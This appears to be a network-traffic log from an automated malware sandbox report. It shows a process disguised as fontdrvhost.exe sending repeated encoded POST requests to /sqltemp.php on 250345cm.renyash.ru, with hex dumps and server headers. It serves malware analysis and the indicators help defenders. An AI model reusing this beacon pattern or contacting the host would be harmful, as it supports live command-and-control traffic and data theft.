                                                                                                                                                                                            Data Ascii: V^_]T[TSXVRYV_YP[\TPUZP^Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$<&43X$;:-U =<_7W*X+# <D&Y8,:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:53:02.981760979 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:03.178299904 CET817INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:03 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iD6Q0xkK6caC%2Btxik4h68LwqDRceglkEJxPcfakE%2FT5UHAvm%2BhxNT%2Bs9C%2FCC1jKafnFzN87JSToAwSEiuuJ%2F%2FQKjHP%2Blph3OyVqReLEiLhtNGXTY3gjI9D0%2FukDvI0uTSNIFEHiQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe495d2a0f39-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3000&min_rtt=1706&rtt_var=3228&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=121071&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            78192.168.2.449884104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:03.310058117 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:03.668241978 CET1012OUTData Raw: 56 53 5a 54 51 5d 51 50 58 56 52 59 56 58 59 51 5b 52 54 50 55 5b 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VSZTQ]QPXVRYVXYQ[RTPU[PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.&?6"<2'>;:=7+?(-'72$(+29&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:03.753956079 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:04.063038111 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:03 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FA%2B80tcENM9T3pNRn3l%2BhLXNm85BHt2GaBafaLtyuHhrCYAyMqPJkyPZ5epunQqGwMUNwdkUk1HNT66e6CEiBnBfgzzoE2wJUcn5fD%2FrCDf6I8eTHJyztgSJ%2FaHhAhR3n4Pmz5MN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe4e2e0f42ee-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2511&min_rtt=1737&rtt_var=2201&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=183971&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            79192.168.2.449889104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:04.182439089 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:04.527276039 CET1012OUTData Raw: 53 54 5f 51 54 5c 54 57 58 56 52 59 56 5b 59 55 5b 5f 54 50 55 55 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: ST_QT\TWXVRYV[YU[_TPUUP[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.0!\"?&'$;). =+)7>7#<(52Y(.:&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:04.646281958 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:04.815267086 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:04 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTLb4yeayiee1U%2B8spm9R8GRu1VtuHpqiKYVFY6Caca2AgjWkcoi6TQTgx6EuOShYje5ciAmCKg%2BIWCMsr%2FGUhE1XT0pdCiLXBWbEw75UTdM5ugUsH%2BMUTt73udXkGQqHCioxWwy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe53bc68424d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3945&min_rtt=1682&rtt_var=5157&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=73778&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            80192.168.2.449896104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:05.166491032 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:05.512080908 CET1012OUTData Raw: 56 54 5a 57 54 5d 54 56 58 56 52 59 56 5c 59 54 5b 5b 54 5e 55 55 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VTZWT]TVXVRYV\YT[[T^UUPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$Z#<=^'.A;)9 > Y<93U)+#3Z?862'-&Y.,Y-5


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            81192.168.2.449897104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:05.531423092 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:05.886569023 CET1852OUTData Raw: 56 51 5f 53 54 58 51 56 58 56 52 59 56 5c 59 56 5b 5b 54 5e 55 5d 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQ_STXQVXVRYV\YV[[T^U]PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3/#Y>'X ;)>70^(+U*;!!?Y((%&,;V-*&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:06.000952005 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:06.180035114 CET948INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:06 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AUsHUI%2BZbwJeteleSdfSHkwkox0n7VWKDj1zSIwZ9Wv6XjQBkBoM27kku97%2FdrQHfWP9b8dM7kQnCBv7K1SPB0yOiab2vvTOFOO8wRtSTmGNxDyprtocrCofT%2Bkg2v76XzZmnBy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe5c3b3017e9-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6308&min_rtt=3770&rtt_var=6490&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=60641&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 1c 29 2e 3e 57 32 0c 24 59 3c 13 3b 52 31 07 29 01 29 38 21 04 30 3e 27 10 29 29 0a 00 21 05 32 02 24 38 30 5f 37 5b 30 03 25 34 2b 59 05 1c 23 1a 23 3f 01 00 2a 2d 30 05 26 06 31 13 24 10 28 58 2b 38 28 1c 37 3b 0d 58 24 13 38 13 3d 3a 20 56 26 2f 23 14 2d 06 35 54 24 10 2c 54 00 11 26 51 25 31 28 1b 20 0e 2c 12 22 1f 26 01 32 1a 32 56 26 12 23 51 21 2a 3e 5c 26 22 3b 1d 23 23 2e 59 31 15 2d 10 23 13 0d 52 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a
                                                                                                                                                                                            Data Ascii: 98%).>W2$Y<;R1))8!0>'))!2$80_7[0%4+Y##?*-0&1$(X+8(7;X$8=: V&/#-5T$,T&Q%1( ,"&22V&#Q!*>\&";##.Y1-#R=>%S -H?WS
                                                                                                                                                                                            Jan 1, 2025 14:53:06.270431995 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            82192.168.2.449902104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:05.697575092 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:06.042821884 CET1012OUTData Raw: 53 54 5a 50 54 5c 51 55 58 56 52 59 56 5c 59 5e 5b 59 54 5e 55 58 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: STZPT\QUXVRYV\Y^[YT^UXPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-3,=7/%Y3<,9"#8_**+W*X<Z#1(*+@%;W9:&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:06.160497904 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:06.416774988 CET812INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:06 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SXB%2BznpxfT7UvdKCPqllBlcBWaBp%2BkXgAWFEMckdIsRi%2BjlZAkPB%2BGvonFOrtCAan2LKbEg1dbeMnz4uenogFYLsPqPSqc7E%2Bc8IWb%2BTp9BNAb2dkhpEEmKne7oL9xfIkB9W%2BMjt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe5d3e8f42c2-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4237&min_rtt=1817&rtt_var=5522&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=68932&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            83192.168.2.449908104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:06.541202068 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:06.886646032 CET1008OUTData Raw: 56 5f 5a 56 54 5c 51 55 58 56 52 59 56 59 59 51 5b 5f 54 50 55 5f 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V_ZVT\QUXVRYVYYQ[_TPU_P\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0=\7=0.;D82 8X(9#U*>? $<2Y;.*&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:53:07.004755974 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:07.271003008 CET804INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:07 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eAf5PqMewuOgquoZt4A8UITsOANHEtslBj3ofs1b5yLWXgDSGjvGidZj9VDplw6%2FdOGAuIkfbTgqTsOGth8cEc1NGxGLpbYw2qDXw%2BB2a%2B1JQHzKYm0QEjarU2SQxKGan0ymsC7d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe627b914402-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4048&min_rtt=1701&rtt_var=5332&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1303&delivery_rate=71299&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            84192.168.2.449914104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:07.410691023 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:07.761712074 CET1012OUTData Raw: 56 51 5a 51 54 5a 54 54 58 56 52 59 56 5c 59 5f 5b 5e 54 59 55 5a 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VQZQTZTTXVRYV\Y_[^TYUZP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&/:7,9$.8/:9 .<^('S(-8[7'(62:&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:07.882718086 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:08.150784016 CET800INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:08 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkTBELDQghU0JIXSEIytL7qiUEgp6uIlHqkBZI4OLECwitH3dpyrGqKFjWyusMo3rv%2B0gDPvTxXTVfSSXvfRP947aDccOOlDCq52UiFd6nNuhfaDr0w7w26GmzTDbYV4WfNaHXkF"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe67fb8c43eb-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3900&min_rtt=1699&rtt_var=5039&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=75612&cwnd=182&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            85192.168.2.449921104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:08.424881935 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:08.777205944 CET1012OUTData Raw: 56 50 5a 51 54 5f 54 57 58 56 52 59 56 5a 59 51 5b 58 54 5f 55 5a 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VPZQT_TWXVRYVZYQ[XT_UZP_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.^3"4%3#;#<^+V> !10+;5B2?89*&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:53:08.873054028 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:09.134896994 CET802INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:09 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CovKArH8aN5QnTtLB%2Bi5BE6C286YiyM2bysk2Iaq0tNQQ0t8tDNDvPi4ItnQ0Slt%2FZlve1UHC3y7IDOf5cECtao9r02nlVh0reLE6KeKHrmsVcUdZBITvQCCNhLejDW2jRksYYUW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2fe6e29745e7c-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4436&min_rtt=1721&rtt_var=6075&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=62284&cwnd=195&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            86192.168.2.449927104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:09.259058952 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
